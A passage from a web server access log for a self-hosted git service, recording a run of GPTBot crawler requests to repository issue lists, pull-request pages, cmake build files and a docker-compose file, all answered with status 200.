AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12995] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13511] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13509] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13512] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13567] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13511] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13562] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 13852] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:18:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 